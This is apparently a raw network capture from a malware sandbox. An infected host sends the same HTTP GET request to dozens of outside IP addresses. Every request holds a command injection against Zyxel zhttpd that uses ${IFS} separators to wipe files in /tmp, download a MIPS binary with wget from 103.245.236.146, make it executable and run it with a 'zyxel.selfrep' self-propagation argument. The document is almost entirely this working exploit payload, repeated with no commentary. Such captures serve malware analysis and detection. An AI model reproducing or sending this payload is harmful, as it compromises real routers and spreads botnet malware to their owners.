                                              Jan 29, 2024 07:04:09.389625072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9167192.168.2.1436270174.113.81.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389673948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9168192.168.2.143490064.86.126.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389694929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9169192.168.2.1443594139.157.62.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389740944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9170192.168.2.145708471.200.106.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389769077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9171192.168.2.143860845.212.97.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389811993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9172192.168.2.1459696218.66.196.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389848948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9173192.168.2.1449964180.81.177.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389878988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9174192.168.2.143336492.160.195.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389919996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9175192.168.2.1458052219.216.165.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389971972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9176192.168.2.144017693.216.118.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390026093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9177192.168.2.1449518117.111.191.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390067101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9178192.168.2.1453134137.146.124.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390094995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9179192.168.2.1450440138.11.123.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390130043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9180192.168.2.1448654167.86.192.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390177011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9181192.168.2.1443954155.14.79.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390228987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9182192.168.2.143815424.249.154.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390244007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9183192.168.2.1444008145.232.205.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390316010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9184192.168.2.144098660.164.228.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390356064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9185192.168.2.1433074212.220.254.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390410900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9186192.168.2.1435228173.58.162.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390429020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9187192.168.2.143995693.131.55.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390500069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9188192.168.2.1437206158.221.253.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390549898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9189192.168.2.145354069.233.174.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390589952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9190192.168.2.145426890.61.248.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390604973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9191192.168.2.145315475.94.238.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390629053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192192.168.2.1447246166.203.195.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390676022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9193192.168.2.145783014.98.222.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390714884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9194192.168.2.1455712188.172.254.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390748024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9195192.168.2.1444654179.195.156.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390783072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9196192.168.2.1454236194.14.29.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390818119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9197192.168.2.1449726172.47.70.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390867949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9198192.168.2.1444260178.245.103.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390933990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9199192.168.2.143399252.42.53.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390959978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9200192.168.2.144423239.249.18.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.390995979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9201192.168.2.1459482129.250.0.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391024113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9202192.168.2.1441646174.76.208.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391073942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9203192.168.2.1444602184.172.168.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391100883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9204192.168.2.143597649.220.176.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391154051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9205192.168.2.1444766219.227.100.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391172886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9206192.168.2.1445708186.236.102.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391241074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9207192.168.2.1454620116.39.124.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391283035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9208192.168.2.1453058179.175.139.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391310930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9209192.168.2.1458254141.74.81.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391350985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9210192.168.2.1454622112.77.248.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391406059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9211192.168.2.1452124190.21.186.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391452074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9212192.168.2.1451530111.46.61.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391483068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9213192.168.2.1441392216.187.69.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391522884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9214192.168.2.146088268.63.130.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391556978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9215192.168.2.143327476.221.118.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391585112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9216192.168.2.146087041.144.156.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391632080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9217192.168.2.145842637.100.8.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391679049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9218192.168.2.143712465.37.157.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391705990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9219192.168.2.1459424167.2.125.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391751051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9220192.168.2.1436366179.56.72.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391798019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9221192.168.2.1447450216.81.33.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391848087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9222192.168.2.1449368222.3.108.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391872883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9223192.168.2.1442966202.249.26.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391910076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9224192.168.2.145925694.78.24.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391942978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9225192.168.2.1441254170.14.178.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.391993999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9226192.168.2.1441118201.121.183.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392045975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9227192.168.2.1448726185.52.139.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392071009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9228192.168.2.144120670.199.148.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392118931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9229192.168.2.1433856128.171.206.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392169952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9230192.168.2.1440184123.24.51.82443
                                              TimestampBytes transferredDirectionData
